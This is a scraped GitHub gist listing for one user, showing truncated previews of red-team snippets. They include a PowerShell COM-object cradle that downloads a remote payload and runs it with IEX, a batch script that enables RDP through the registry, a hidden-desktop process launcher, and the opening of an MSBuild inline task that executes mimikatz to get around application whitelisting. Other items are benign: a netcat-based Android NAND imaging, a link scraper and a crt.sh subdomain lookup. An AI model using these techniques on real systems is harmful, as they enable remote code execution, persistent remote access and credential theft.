Boschko OlivierLaflamme
OlivierLaflamme
/ COM version of downloadstring
Created
February 22, 2021 16:57
COM version of downloadstring
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText; | |
| -------------- | |
| https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html |
OlivierLaflamme
/ Open port 3389 through the registry
Last active
October 19, 2022 22:03
Open port 3389 through the registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo Windows Registry Editor Version 5.00 >>3389.reg | |
| echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg | |
| echo "fDenyTSConnections"=dword:00000000 >>3389.reg | |
| echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg | |
| echo "PortNumber"=dword:00000D3D >>3389.reg | |
| echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg | |
| echo "PortNumber"=dword:00000D3D >>3389.reg | |
| regedit /s 3389.reg |
OlivierLaflamme
/ NAND aquisition done with netcat & logical aquisition
Last active
May 11, 2021 02:08
NAND aquisition done with netcat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| adb devices | |
| adb push ./nc /sdcard/nc | |
| adb forward tcp:4444 tcp:4444 | |
| adb shell | |
| su | |
| cp /sdcard/nc /dev/nc | |
| chmod 777 /dev/nc | |
| dd if=/dev/block/mmblk0 bs 65535 | \ /dev/bc -nvlp 4444 | |
| nc -nv 127.0.0.1 4444 > image.nand | |
| sha256sum image.nand |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var x = document.querySelectorAll("a"); | |
| var myarray = [] | |
| for (var i=0; i<x.length; i++){ | |
| var nametext = x[i].textContent; | |
| var cleantext = nametext.replace(/\s+/g, ' ').trim(); | |
| var cleanlink = x[i].href; | |
| myarray.push([cleantext,cleanlink]); | |
| }; | |
| function make_table() { | |
| var table = '<table><thead><th>Name</th><th>Links</th></thead><tbody>'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // To compile: gcc64.exe run.c -o run.exe | |
| // To run: run.exe cmd.exe "/c whoami" | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| CHAR cDesktop[] = "hiddendesktop"; | |
| HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
OlivierLaflamme
/ comp_decomp.ps1
Created
August 27, 2021 05:44
PowerShell compression \ decompression. I manage to get 50% decreasse on a small input stream.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Compression: | |
| $s = @'YourInputHere"@ | |
| $ms = New-Object System.IO.MemoryStream | |
| $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress) | |
| $sw = New-Object System.IO.StreamWriter($cs) | |
| $sw.Write($s) | |
| $sw.Close(); | |
| $s = [System.Convert]::ToBase64String($ms.ToArray()) | |
| Decompression: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| client.c | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define MAX_SIZE 1024 | |
| int main(int argc, char **argv) { | |
| CHAR *remotePipeName = (CHAR*)GlobalAlloc(GPTR, MAX_SIZE); | |
| DWORD dwWritten = 0; |
OlivierLaflamme
/ malleable_c2_profiles_09272021
Created
September 28, 2021 06:40
— forked from MHaggis/malleable_c2_profiles_09272021
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs | |
| https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md | |
| https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py | |
| https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md | |
| https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests, sys, re | |
| domain = sys.argv[1] | |
| url = f'https://crt.sh/?q={domain}' | |
| user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'} | |
| r = requests.get(url, headers=user_agent) | |
| match = re.findall(f'.*?.{domain}', r.text) | |
| res = [] |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes mimikatz. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |